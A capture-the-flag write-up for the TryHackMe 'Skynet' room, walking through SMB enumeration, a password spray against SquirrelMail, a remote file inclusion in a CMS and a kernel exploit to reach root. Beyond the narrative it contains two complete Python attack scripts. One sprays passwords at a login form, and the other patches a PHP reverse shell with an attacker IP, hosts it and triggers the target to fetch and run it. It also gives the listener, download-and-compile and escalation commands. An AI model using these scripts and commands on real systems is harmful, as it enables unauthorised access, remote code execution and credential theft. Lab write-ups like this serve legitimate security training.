skynet

General

This is a writeup of the room https://tryhackme.com/room/skynet.

Writeup

The first thing I did was an nmap scan,

nmap -sV -oN nmap.out <ip>

which reported an Apache httpd 2.4.18 web server on port 80 and Samba smbd 3.X - 4.X on ports 139 and 445.

The website itself did not give away much, so my next step was to enumerate for other pages,

gobuster dir -u <ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

which yielded the noteworthy page http://<ip>/squirrelmail, a login page. The exploit I could find for this service required authentication, so I continued enumerating.

Listing the folders shared via SMB revealed the noteworthy shares anonymous and milesdyson. Access to milesdyson was denied, but anonymous was not.

smbclient --no-pass -L //<ip>
smbclient --no-pass //<ip>/anonymous

This turned up a file, attention.txt, and a folder logs containing log1.txt, log2.txt and log3.txt, the first of which had wordlist-like content.

Now, the question to answer is "What is Miles password for his emails?", so I tried the username milesdyson against the SquirrelMail login together with the words from that wordlist, which was successful.
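The spray against the SquirrelMail login as a script, an added example that is not part of the original writeup. It assumes SquirrelMail's stock login form (a POST to src/redirect.php with the fields login_username and secretkey) and that a failed login returns a page containing the word "incorrect"; both are assumptions about the target and should be confirmed with one manual login attempt first. The post hook is injectable so the logic can be checked without a target.

```python
"""Spray words from an SMB-harvested wordlist against a SquirrelMail login.

Added example for this writeup, not code from the original post. Assumptions
about the target (verify against one manual login first):
  - SquirrelMail's stock login form posts to <base>/src/redirect.php with
    the fields login_username and secretkey;
  - a failed login returns a page containing the word "incorrect".
"""
import sys
import urllib.parse
import urllib.request

LOGIN_PATH = "/src/redirect.php"   # assumed SquirrelMail login handler
FAIL_MARKER = "incorrect"          # assumed fragment of the failed-login message


def http_post(url, fields):
    """POST form fields with a fresh cookie jar and return the final page body."""
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
    data = urllib.parse.urlencode(fields).encode()
    with opener.open(url, data=data, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def login_ok(body):
    """A login succeeded if the failure text is absent from the returned page."""
    return FAIL_MARKER not in body


def candidate_words(lines):
    """Strip whitespace, drop blanks and duplicates, keep first-seen order."""
    seen = set()
    words = []
    for line in lines:
        word = line.strip()
        if word and word not in seen:
            seen.add(word)
            words.append(word)
    return words


def spray(base_url, user, words, post=http_post):
    """Try each word as user's password; return the first hit or None.

    `post` is injectable so the logic can be exercised without a target.
    """
    url = base_url.rstrip("/") + LOGIN_PATH
    for password in words:
        body = post(url, {"login_username": user, "secretkey": password})
        if login_ok(body):
            return password
    return None


def main(argv):
    if len(argv) != 4:
        print("usage: %s http://<ip>/squirrelmail <user> <wordlist>" % argv[0])
        return 2
    base_url, user, wordlist = argv[1:]
    with open(wordlist, errors="replace") as fh:
        words = candidate_words(fh)
    hit = spray(base_url, user, words)
    print("password: %s" % hit if hit else "no hit in %d words" % len(words))
    return 0 if hit else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 spray.py http://<ip>/squirrelmail milesdyson log1.txt`. Each attempt uses a fresh cookie jar so a successful redirect into the mailbox is followed with the right session; hydra's http-post-form module does the same job in one line once the field names and failure string are known.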

Inside the mail portal there is a mail about an SMB password change, revealing a password.

Using this password, access to the milesdyson share is granted.

smbclient -U milesdyson //<ip>/milesdyson

Having a look around reveals a notes folder containing a file, important.txt. This file points to a hidden directory /45kra..., answering the question "What is the hidden directory?".

Accessing http://<ip>/45kra... presents Miles Dyson's personal page, which seems useless at first. Enumerating it for subpages,

gobuster dir -u <ip>/45kra... -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

yields http://<ip>/45kra.../administrator, a CMS login page.

A quick look at exploit-db for this CMS instantly reveals which vulnerability it suffers from, remote file inclusion (RFI), which answers the question "What is the vulnerability called when you can include a remote file for malicious purposes?", if the question itself did not give it away already.

The next step was to try to get a reverse shell by exploiting this vulnerability.

First, I tested the URL provided in the exploit to confirm the include really is exploitable. A remote include only works when PHP's allow_url_include (and allow_url_fopen) is enabled on the target, so this check is worth doing before setting anything else up.

Second, set up a listener:

nc -lvnp <port>

Third, prepare a reverse shell by setting the IP and port of the attacker machine and listener in the script. I prefer this one: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php.

Fourth, make this file available to the target machine, e.g. by hosting it on a web server that serves it as plain text (the target must receive the PHP source, not the output of executing it):

python3 -m http.server

Last, trigger the include from the target by requesting the vulnerable page with urlConfig pointing at the hosted file (python3 -m http.server listens on port 8000 by default). The target fetches and executes the script, and the reverse shell arrives on the listener.

http://<ip>/45kra.../administrator/alerts/alertConfigField.php?urlConfig=http://<webserver_ip>:<port>/php-reverse-shell.php
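The delivery steps above in one script, as an added example that is not part of the original writeup or of the exploit it cites. It assumes the vulnerable path used in the URL above (administrator/alerts/alertConfigField.php?urlConfig=...), a copy of pentestmonkey's php-reverse-shell.php in the current directory, a listener already running (nc -lvnp <listener_port>) and an attacker IP the target can reach; the hidden directory name is an argument because the writeup shows it truncated.

```python
"""Deliver pentestmonkey's PHP reverse shell through the urlConfig include.

Added example for this writeup, not code from the original post or from the
exploit it cites. Assumptions: the vulnerable path is the one used in the
writeup (administrator/alerts/alertConfigField.php?urlConfig=...), a copy of
php-reverse-shell.php sits in the current directory, a listener is already
running (nc -lvnp <listener_port>), and the target can reach the attacker's
IP. The hidden directory name is an argument because the writeup shows it
truncated.
"""
import functools
import http.server
import os
import re
import socketserver
import sys
import tempfile
import threading
import urllib.parse
import urllib.request

VULN_PATH = "administrator/alerts/alertConfigField.php"  # path from the writeup's URL


def patch_reverse_shell(src, attacker_ip, attacker_port):
    """Rewrite the `$ip = '...';` and `$port = ...;` lines the script ships with."""
    src, n_ip = re.subn(r"\$ip\s*=\s*'[^']*';", "$ip = '%s';" % attacker_ip, src, count=1)
    src, n_port = re.subn(r"\$port\s*=\s*\d+;", "$port = %d;" % attacker_port, src, count=1)
    if n_ip != 1 or n_port != 1:
        raise ValueError("did not find the $ip/$port lines to patch")
    return src


def build_trigger_url(target_base, hidden_dir, host_ip, host_port, filename):
    """URL that makes the target fetch, include and execute the hosted PHP file."""
    remote = "http://%s:%d/%s" % (host_ip, host_port, filename)
    query = urllib.parse.urlencode({"urlConfig": remote})
    return "%s/%s/%s?%s" % (target_base.rstrip("/"), hidden_dir.strip("/"), VULN_PATH, query)


def serve_directory(directory, port):
    """Serve `directory` raw over HTTP in a background thread (PHP source, not its output)."""
    handler = functools.partial(http.server.SimpleHTTPRequestHandler, directory=directory)
    socketserver.TCPServer.allow_reuse_address = True
    httpd = socketserver.TCPServer(("0.0.0.0", port), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


def trigger(url, timeout=5):
    """Request the vulnerable page once.

    The include blocks for as long as the shell is alive, so a timeout is the
    expected outcome when it worked; a clean return usually means it did not.
    """
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except OSError as exc:   # socket timeouts and URLErrors are both OSError
        return "request ended (%s): check the listener" % type(exc).__name__
    return "request returned normally: shell probably did not connect"


def main(argv):
    if len(argv) != 6:
        print("usage: %s <target_base_url> <hidden_dir> <attacker_ip> <http_port> <listener_port>" % argv[0])
        return 2
    target_base, hidden_dir, attacker_ip = argv[1:4]
    http_port, listener_port = int(argv[4]), int(argv[5])
    with open("php-reverse-shell.php") as fh:
        shell = patch_reverse_shell(fh.read(), attacker_ip, listener_port)
    workdir = tempfile.mkdtemp()
    with open(os.path.join(workdir, "php-reverse-shell.php"), "w") as fh:
        fh.write(shell)
    httpd = serve_directory(workdir, http_port)
    url = build_trigger_url(target_base, hidden_dir, attacker_ip, http_port, "php-reverse-shell.php")
    print("GET", url)
    print(trigger(url))
    httpd.shutdown()
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Start the nc listener first, then run e.g. `python3 rfi_shell.py http://<ip> <hidden_dir> <attacker_ip> 8000 <listener_port>`. The patched shell is written to a temporary directory so only that one file is exposed by the helper web server, and the trigger request is given a short timeout because a working include never returns while the shell is connected.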

With a reverse shell, obtain the user flag to answer "What is the user flag?".

cd /home/milesdyson
cat user.txt

My way to root was to gather system information and use the kernel exploit https://www.exploit-db.com/exploits/43418. Check that the kernel version reported by uname -a actually matches the version the exploit is written for before running it; a kernel exploit on the wrong version can crash the box instead of escalating.

uname -a

Moreover, wget and gcc were present on the target machine, which allowed me to download and compile the exploit there. I used the following method.

First, download the exploit on the attacking machine.

Second, set up a web server in the folder it was saved to, as the target machine had no internet access and could not wget it directly.

Last, transfer the exploit from the attacking machine to the target machine. I used /tmp as my working folder on the target as it tends to be writable. Then compile and execute.

cd /tmp
wget http://<attacking_ip>:<port>/pwn.c
gcc pwn.c -o pwn
./pwn

Congrats on root. The question "What is the root flag?" should now be an easy one.
